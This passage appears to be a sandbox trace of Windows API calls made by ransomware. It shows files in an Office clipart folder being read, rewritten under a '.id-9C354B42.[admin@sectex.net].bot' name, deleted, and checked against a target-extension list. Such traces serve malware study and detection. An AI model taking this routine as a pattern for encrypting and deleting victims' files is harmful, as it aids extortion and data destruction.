	[0170.318] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=5100) returned 1
	[0170.318] CloseHandle (hObject=0x388) returned 1
	[0170.319] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174639.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0174639.wmf")) returned 0x20
	[0170.319] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174639.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0174639.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0170.319] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174639.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0174639.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0170.319] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.319] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.319] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174639.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0174639.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0170.320] GetLastError () returned 0x0
	[0170.320] ReadFile (in: hFile=0x388, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x13ec, lpOverlapped=0x0) returned 1
	[0170.427] WriteFile (in: hFile=0x3c4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x13f0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x13f0, lpOverlapped=0x0) returned 1
	[0170.428] ReadFile (in: hFile=0x388, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0170.428] WriteFile (in: hFile=0x3c4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0170.428] SetEndOfFile (hFile=0x3c4) returned 1
	[0170.586] CloseHandle (hObject=0x3c4) returned 1
	[0170.586] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.586] SetEndOfFile (hFile=0x388) returned 1
	[0170.588] CloseHandle (hObject=0x388) returned 1
	[0170.588] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174639.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0170.589] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174639.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0174639.wmf")) returned 1
	[0170.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174639.WMF") returned 63
	[0170.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174639.WMF") returned 63
	[0170.589] lstrlenW (lpString=".doc") returned 4
	[0170.589] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0170.589] lstrlenW (lpString=".docx") returned 5
	[0170.589] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1
	[0170.589] lstrlenW (lpString=".pdf") returned 4
	[0170.589] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0170.589] lstrlenW (lpString=".xls") returned 4
	[0170.590] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0170.590] lstrlenW (lpString=".xlsx") returned 5
	[0170.590] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1
	[0170.590] lstrlenW (lpString=".ppt") returned 4
	[0170.590] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0170.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174639.WMF") returned 63
	[0170.590] lstrlenW (lpString=".zip") returned 4
	[0170.590] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0170.590] lstrlenW (lpString=".rar") returned 4
	[0170.590] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0170.590] lstrlenW (lpString=".bz2") returned 4
	[0170.590] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0170.590] lstrlenW (lpString=".7z") returned 3
	[0170.590] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0170.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174639.WMF") returned 63
	[0170.590] lstrlenW (lpString=".dbf") returned 4
	[0170.590] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0170.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174639.WMF") returned 63
	[0170.590] lstrlenW (lpString=".1cd") returned 4
	[0170.590] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0170.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174639.WMF") returned 63
	[0170.590] lstrlenW (lpString=".jpg") returned 4
	[0170.590] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0170.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174639.WMF") returned 63
	[0170.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174639.WMF") returned 63
	[0170.590] lstrlenW (lpString=".doc") returned 4
	[0170.590] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0170.590] lstrlenW (lpString=".docx") returned 5
	[0170.590] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1
	[0170.590] lstrlenW (lpString=".pdf") returned 4
	[0170.590] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0170.590] lstrlenW (lpString=".xls") returned 4
	[0170.590] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0170.590] lstrlenW (lpString=".xlsx") returned 5
	[0170.591] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1
	[0170.591] lstrlenW (lpString=".ppt") returned 4
	[0170.591] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0170.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174639.WMF") returned 63
	[0170.591] lstrlenW (lpString=".zip") returned 4
	[0170.591] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0170.591] lstrlenW (lpString=".rar") returned 4
	[0170.591] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0170.591] lstrlenW (lpString=".bz2") returned 4
	[0170.591] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0170.591] lstrlenW (lpString=".7z") returned 3
	[0170.591] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0170.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174639.WMF") returned 63
	[0170.591] lstrlenW (lpString=".dbf") returned 4
	[0170.591] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0170.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174639.WMF") returned 63
	[0170.591] lstrlenW (lpString=".1cd") returned 4
	[0170.591] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0170.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174639.WMF") returned 63
	[0170.591] lstrlenW (lpString=".jpg") returned 4
	[0170.591] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0170.591] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0170.591] lstrlenW (lpString="J0178348.JPG") returned 12
	[0170.591] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178348.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0170.593] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=36989) returned 1
	[0170.593] CloseHandle (hObject=0x388) returned 1
	[0170.593] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178348.jpg")) returned 0x20
	[0170.593] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178348.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0170.593] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178348.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0170.594] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.594] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.594] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178348.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0170.594] GetLastError () returned 0x0
	[0170.594] ReadFile (in: hFile=0x388, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x907d, lpOverlapped=0x0) returned 1
	[0170.596] WriteFile (in: hFile=0x3c4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x9080, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x9080, lpOverlapped=0x0) returned 1
	[0170.598] ReadFile (in: hFile=0x388, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0170.598] WriteFile (in: hFile=0x3c4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0170.598] SetEndOfFile (hFile=0x3c4) returned 1
	[0170.598] CloseHandle (hObject=0x3c4) returned 1
	[0170.598] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.598] SetEndOfFile (hFile=0x388) returned 1
	[0170.600] CloseHandle (hObject=0x388) returned 1
	[0170.601] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0170.601] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178348.jpg")) returned 1
	[0170.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG") returned 63
	[0170.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG") returned 63
	[0170.602] lstrlenW (lpString=".doc") returned 4
	[0170.602] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0170.602] lstrlenW (lpString=".docx") returned 5
	[0170.602] lstrcmpiW (lpString1=".docx", lpString2="8.JPG") returned -1
	[0170.602] lstrlenW (lpString=".pdf") returned 4
	[0170.603] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0170.603] lstrlenW (lpString=".xls") returned 4
	[0170.603] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0170.603] lstrlenW (lpString=".xlsx") returned 5
	[0170.603] lstrcmpiW (lpString1=".xlsx", lpString2="8.JPG") returned -1
	[0170.603] lstrlenW (lpString=".ppt") returned 4
	[0170.603] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0170.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG") returned 63
	[0170.603] lstrlenW (lpString=".zip") returned 4
	[0170.603] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0170.603] lstrlenW (lpString=".rar") returned 4
	[0170.603] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0170.603] lstrlenW (lpString=".bz2") returned 4
	[0170.603] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0170.603] lstrlenW (lpString=".7z") returned 3
	[0170.603] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0170.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG") returned 63
	[0170.603] lstrlenW (lpString=".dbf") returned 4
	[0170.603] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0170.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG") returned 63
	[0170.603] lstrlenW (lpString=".1cd") returned 4
	[0170.603] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0170.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG") returned 63
	[0170.603] lstrlenW (lpString=".jpg") returned 4
	[0170.603] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0170.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG") returned 63
	[0170.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG") returned 63
	[0170.603] lstrlenW (lpString=".doc") returned 4
	[0170.603] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0170.603] lstrlenW (lpString=".docx") returned 5
	[0170.603] lstrcmpiW (lpString1=".docx", lpString2="8.JPG") returned -1
	[0170.603] lstrlenW (lpString=".pdf") returned 4
	[0170.603] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0170.604] lstrlenW (lpString=".xls") returned 4
	[0170.604] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0170.604] lstrlenW (lpString=".xlsx") returned 5
	[0170.604] lstrcmpiW (lpString1=".xlsx", lpString2="8.JPG") returned -1
	[0170.604] lstrlenW (lpString=".ppt") returned 4
	[0170.604] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0170.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG") returned 63
	[0170.604] lstrlenW (lpString=".zip") returned 4
	[0170.604] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0170.604] lstrlenW (lpString=".rar") returned 4
	[0170.604] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0170.604] lstrlenW (lpString=".bz2") returned 4
	[0170.604] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0170.604] lstrlenW (lpString=".7z") returned 3
	[0170.604] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0170.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG") returned 63
	[0170.604] lstrlenW (lpString=".dbf") returned 4
	[0170.604] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0170.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG") returned 63
	[0170.604] lstrlenW (lpString=".1cd") returned 4
	[0170.604] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0170.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG") returned 63
	[0170.604] lstrlenW (lpString=".jpg") returned 4
	[0170.604] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0170.604] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0170.604] lstrlenW (lpString="J0178459.JPG") returned 12
	[0170.604] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178459.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178459.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0170.605] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=29204) returned 1
	[0170.605] CloseHandle (hObject=0x388) returned 1
	[0170.605] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178459.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178459.jpg")) returned 0x20
	[0170.605] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178459.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178459.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0170.605] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178459.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178459.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0170.605] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.606] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.606] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178459.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178459.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0170.610] GetLastError () returned 0x0
	[0170.610] ReadFile (in: hFile=0x388, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x7214, lpOverlapped=0x0) returned 1
	[0170.612] WriteFile (in: hFile=0x3c4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x7220, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x7220, lpOverlapped=0x0) returned 1
	[0170.613] ReadFile (in: hFile=0x388, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0170.613] WriteFile (in: hFile=0x3c4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0170.614] SetEndOfFile (hFile=0x3c4) returned 1
	[0170.614] CloseHandle (hObject=0x3c4) returned 1
	[0170.614] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.614] SetEndOfFile (hFile=0x388) returned 1
	[0170.616] CloseHandle (hObject=0x388) returned 1
	[0170.616] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178459.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0170.616] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178459.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178459.jpg")) returned 1
	[0170.617] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178459.JPG") returned 63
	[0170.617] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178459.JPG") returned 63
	[0170.617] lstrlenW (lpString=".doc") returned 4
	[0170.618] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0170.618] lstrlenW (lpString=".docx") returned 5
	[0170.618] lstrcmpiW (lpString1=".docx", lpString2="9.JPG") returned -1
	[0170.618] lstrlenW (lpString=".pdf") returned 4
	[0170.618] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0170.618] lstrlenW (lpString=".xls") returned 4
	[0170.618] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0170.618] lstrlenW (lpString=".xlsx") returned 5
	[0170.618] lstrcmpiW (lpString1=".xlsx", lpString2="9.JPG") returned -1
	[0170.618] lstrlenW (lpString=".ppt") returned 4
	[0170.618] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0170.618] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178459.JPG") returned 63
	[0170.618] lstrlenW (lpString=".zip") returned 4
	[0170.618] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0170.618] lstrlenW (lpString=".rar") returned 4
	[0170.618] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0170.618] lstrlenW (lpString=".bz2") returned 4
	[0170.618] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0170.618] lstrlenW (lpString=".7z") returned 3
	[0170.618] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0170.618] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178459.JPG") returned 63
	[0170.618] lstrlenW (lpString=".dbf") returned 4
	[0170.618] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0170.618] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178459.JPG") returned 63
	[0170.618] lstrlenW (lpString=".1cd") returned 4
	[0170.618] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0170.618] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178459.JPG") returned 63
	[0170.618] lstrlenW (lpString=".jpg") returned 4
	[0170.618] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0170.618] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178459.JPG") returned 63
	[0170.618] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178459.JPG") returned 63
	[0170.618] lstrlenW (lpString=".doc") returned 4
	[0170.619] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0170.619] lstrlenW (lpString=".docx") returned 5
	[0170.619] lstrcmpiW (lpString1=".docx", lpString2="9.JPG") returned -1
	[0170.619] lstrlenW (lpString=".pdf") returned 4
	[0170.619] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0170.619] lstrlenW (lpString=".xls") returned 4
	[0170.619] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0170.619] lstrlenW (lpString=".xlsx") returned 5
	[0170.619] lstrcmpiW (lpString1=".xlsx", lpString2="9.JPG") returned -1
	[0170.619] lstrlenW (lpString=".ppt") returned 4
	[0170.619] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0170.619] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178459.JPG") returned 63
	[0170.619] lstrlenW (lpString=".zip") returned 4
	[0170.619] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0170.619] lstrlenW (lpString=".rar") returned 4
	[0170.619] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0170.619] lstrlenW (lpString=".bz2") returned 4
	[0170.619] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0170.619] lstrlenW (lpString=".7z") returned 3
	[0170.619] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0170.619] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178459.JPG") returned 63
	[0170.619] lstrlenW (lpString=".dbf") returned 4
	[0170.619] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0170.619] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178459.JPG") returned 63
	[0170.619] lstrlenW (lpString=".1cd") returned 4
	[0170.619] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0170.619] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178459.JPG") returned 63
	[0170.619] lstrlenW (lpString=".jpg") returned 4
	[0170.619] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0170.619] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0170.620] lstrlenW (lpString="J0178460.JPG") returned 12
	[0170.620] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178460.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178460.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0170.620] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=26531) returned 1
	[0170.620] CloseHandle (hObject=0x388) returned 1
	[0170.620] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178460.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178460.jpg")) returned 0x20
